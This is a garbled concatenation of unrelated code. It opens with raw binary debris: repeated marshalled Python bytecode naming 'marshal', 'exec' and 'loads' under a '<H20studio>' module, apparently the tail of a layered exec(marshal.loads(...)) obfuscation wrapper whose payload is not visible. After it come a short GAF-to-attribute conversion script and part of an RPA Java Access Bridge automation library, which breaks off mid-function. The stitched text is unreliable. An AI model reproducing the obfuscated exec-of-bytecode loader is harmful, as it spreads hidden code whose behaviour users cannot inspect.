0\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01')) |
#!/usr/bin/python3
import sys
'''
tab_to_attr -- convert tab delimit file to attr
'''
def gaf_to_attr(input_file):
feature_dict = {}
with open(input_file, 'r+') as fh:
''' no title of GAF file '''
'''
first_line = fh.readline()
first_line = first_line.strip('\n')
title = ()
if (first_line[0] == '#'):
title = first_line.split('\t')
title.pop(0)
else:
m = first_line.split('\t')
feature_name = m.pop(0)
feature_dict[feature_name] = m
'''
for line in fh:
line = line.strip('\n')
m = line.split('\t')
feature_name = m[1]
go = m[4]
if feature_name in feature_dict:
feature_dict[feature_name].append(go)
else:
feature_dict[feature_name] = []
feature_dict[feature_name].append(go)
return(feature_dict)
#if __name__ == '__main__':
# tab_to_attr('zd1')
|
import atexit
import logging
import os
import platform
import queue
import threading
import time
from typing import Union
import warnings
from robot.api.deco import library, keyword
from robot.libraries.BuiltIn import BuiltIn
from RPA.Desktop import Desktop
if platform.system() == "Windows":
import ctypes
from ctypes import wintypes, byref
# Configure comtypes to not generate DLL bindings into
# current environment, instead keeping them in memory.
# Slower, but prevents dirtying environments.
import comtypes.client
from JABWrapper.context_tree import ContextTree, ContextNode, SearchElement
from JABWrapper.jab_wrapper import JavaAccessBridgeWrapper
comtypes.client.gen_dir = None
# Ignore warning about threading mode,
# which comtypes initializes to STA instead of MTA on import.
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UserWarning)
import win32con
import win32gui
PeekMessage = ctypes.windll.user32.PeekMessageW
GetMessage = ctypes.windll.user32.GetMessageW
TranslateMessage = ctypes.windll.user32.TranslateMessage
DispatchMessage = ctypes.windll.user32.DispatchMessageW
ScalingFactor = ctypes.windll.shcore.GetScaleFactorForDevice(0) / 100
LocatorType = Union[ContextNode, str]
else:
ScalingFactor = 1.0
LocatorType = str
ContextNode = object
class ElementNotFound(ValueError):
"""No matching elements were found."""
@library(scope="GLOBAL", doc_format="REST", auto_keywords=False)
class JavaAccessBridge:
# pylint: disable=W1401
"""Java application UI automation library using `Java Access Bridge technology`_.
Library is at the beta level at the moment so feedback is highly appreciated.
The library utilizes `java-access-bridge-wrapper`_ package to interact with
Java UI. Currently only the 64-bit Windows OS is supported.
**Steps to enable**
1. Enable the Java Access Bridge in Windows
2. Set environment variable `RC_JAVA_ACCESS_BRIDGE_DLL` as an absolute path to `WindowsAccessBridge-64.dll`
.. code-block:: console
C:\\path\\to\\java\\bin\\jabswitch -enable
set RC_JAVA_ACCESS_BRIDGE_DLL=C:\\Program Files\\Java\\jre1.8.0_261\\bin\WindowsAccessBridge-64.dll
.. _Java Access Bridge technology: https://www.oracle.com/java/technologies/javase/javase-tech-access-bridge.html
.. _java-access-bridge-wrapper: https://github.com/robocorp/java-access-bridge-wrapper
**Locating elements**
To automate actions on the Java application, the robot needs locations to various elements
using a feature called `locators`. Locator describes properties of an element.
At the moment library contains basic level support for locators.
The common locator types are `name` and `role`.
To identify element with more than one property `and` can be used, for example:
.. code-block:: console
role:push button and name:Clear
To address element within parent element `>` can be used, for example:
.. code-block:: console
name:Find Purchase Orders > name:NumberField
Some keywords accept element as an parameter in place of locator.
**Interacting with elements**
By default application elements are interacted with Actions supported by the element.
Most common example is `click` action supported by an button element.
But because application and technology support for the actions might be limited, it is also
possible to opt for interaction elements by their coordinates by giving keyword parameter
``action=False`` if parameter is available.
**Inspecting elements**
Inspecting Java application elements depends on what kind of Java UI framework the application
has been built with.
The `Accessibility Insights for Windows`_ can show element properties if application framework
supports Windows UI Automation (UIA), see more at `using Accessibility Insights`_.
The Google's `Access Bridge Explorer`_ can also be used for inspecting Java application elements.
.. _Accessibility Insights for Windows: https://accessibilityinsights.io/en/downloads/
.. _Access Bridge Explorer: https://github.com/google/access-bridge-explorer
.. _using Accessibility Insights: https://accessibilityinsights.io/docs/en/windows/reference/faq/#can-i-use-accessibility-insights-for-windows-on-a-windows-app-written-with-java
**Examples**
*robotframework*
.. code:: robotframework
*** Settings ***
Library RPA.JavaAccessBridge
Library Process
*** Tasks ***
Write text into Swing application
Start Process java -jar BasicSwing.jar
... shell=${TRUE}
... cwd=${CURDIR}
Select Window Chat Frame
Type Text role:text
... text for the textarea
Type Text role:text
... text for the input field
... index=1
... clear=${TRUE}
Click Element role:push button and name:Send
*Python*
.. code:: python
from RPA.JavaAccessBridge import JavaAccessBridge
import subprocess
jab = JavaAccessBridge()
subprocess.Popen(
["java", "-jar", "BasicSwing.jar"],
shell=True,
cwd=".",
close_fds=True
)
jab.select_window("Chat Frame")
jab.type_text(
"role:text",
"text for the textarea",
enter=True
)
jab.type_text(
"role:text",
"text for the input field",
index=1,
clear=True
)
jab.click_element("role:push button and name:Send")
""" # noqa: E501, W605
# TODO: add keyword for taking screenshots of elements and window
# TODO. implement proper XPath syntax support
def __init__(self):
self.logger = logging.getLogger(__name__)
if platform.system() != "Windows":
self.logger.warning(
"JavaAccessBridge library requires Windows dependencies to work"
)
if "RC_JAVA_ACCESS_BRIDGE_DLL" not in os.environ.keys():
self.logger.warning(
"Environment variable `RC_JAVA_ACCESS_BRIDGE_DLL` needs to be set to "
"absolute path of `WindowsAccessBridge-64.dll`"
)
self.version_printed = False
self.jab_wrapper = None
self.context_info_tree = None
self.pumper_thread = None
self.refresh_counter = 1
self.display_scale_factor = ScalingFactor
def _initialize(self):
pipe = queue.Queue()
self.pumper_thread = threading.Thread(
target=self._pump_background, daemon=True, args=[pipe]
)
self.pumper_thread.start()
self.jab_wrapper = pipe.get(timeout=10)
if not self.jab_wrapper:
raise Exception("Failed to initialize Java Access Bridge Wrapper")
time.sleep(1)
atexit.register(self._handle_shutdown)
self.logger.info("Java Access Bridge Wrapper initialized")
def _handle_shutdown(self):
if self.jab_wrapper:
self.jab_wrapper.shutdown()
def _pump_background(self, pipe: queue.Queue):
try:
jab_wrapper = JavaAccessBridgeWrapper()
pipe.put(jab_wrapper)
message = byref(wintypes.MSG())
while GetMessage(message, 0, 0, 0) > 0:
TranslateMessage(message)
self.logger.debug("Dispatching msg=%s", repr(message))
DispatchMessage(message)
# pylint: disable=broad-except
except Exception as err:
self.logger.error(err)
pipe.put(None)
finally:
self.logger.info("Stopped processing events")
@keyword
def select_window(
self, title: str, bring_foreground: bool = True, timeout: int = 30
):
"""Selects Java application window as target for the automation
:param title: application window title
:param bring_foreground: if application is brought to foreground or not
:param timeout: selection timeout
"""
if self.jab_wrapper is None:
self._initialize()
window_found = False
interval = float(0.5)
end_time = time.time() + float(timeout)
while time.time() <= end_time:
start = time.time()
try:
self.jab_wrapper.switch_window_by_title(title)
window_found = True
break
except Exception: # pylint: disable=broad-except
pass
finally:
duration = time.time() - start
if duration < interval:
time.sleep(interval - duration)
if not window_found:
raise ValueError("Did not find window '%s'" % title)
if not self.version_printed:
version_info = self.jab_wrapper.get_version_info()
self.logger.info(
"VMversion=%s; BridgeJavaClassVersion=%s; BridgeJavaDLLVersion=%s; BridgeWinDLLVersion=%s", # noqa: E501
version_info.VMversion,
version_info.bridgeJavaClassVersion,
version_info.bridgeJavaDLLVersion,
version_info.bridgeWinDLLVersion,
)
self.version_printed = True
if bring_foreground:
handle = self.jab_wrapper.get_current_windows_handle()
# pylint: disable=c-extension-no-member
win32gui.ShowWindow(handle, win32con.SW_SHOW)
# pylint: disable=c-extension-no-member
win32gui.SetForegroundWindow(handle)
self.application_refresh()
def _parse_locator(self, locator):
levels = locator.split(">")
levels = [lvl.strip() for lvl in levels]
searches = []
for lvl in levels:
conditions = lvl.split(" and ")
lvl_search = []
for cond in conditions:
parts = cond.split(":", 1)
if len(parts) == 1:
parts = ["name", parts[0]]
lvl_search.append(parts)
searches.append(lvl_search)
return searches
def _find_elements(self, locator: str, index: int = None):
if not self.context_info_tree:
raise ValueError("ContextTree has not been initialized")
searches = self._parse_locator(locator)
self.logger.info("Searches: %s", searches)
elements = []
for lvl, search in enumerate(searches):
search_elements = []
for s in search:
search_elements.append(SearchElement(s[0], s[1]))
if lvl == 0:
elements = self.context_info_tree.get_by_attrs(search_elements)
else:
sub_matches = []
for elem in elements:
matches = elem.get_by_attrs(search_elements)
sub_matches.extend(matches)
elements = sub_matches
self.logger.info('Search "%s" returned %s element(s)', locator, len(elements))
if index and len(elements) > (index + 1):
raise AttributeError(
"Locator '%s' returned only %s elements (can't index element at %s)"
% (locator, len(elements), index)
)
return elements if index is None else [elements[index]]
@keyword
def set_mouse_position(self, element: ContextNode):
"""Set mouse position to element center
:param element: target element
"""
left, top, right, bottom = self._get_scaled_coordinates(element)
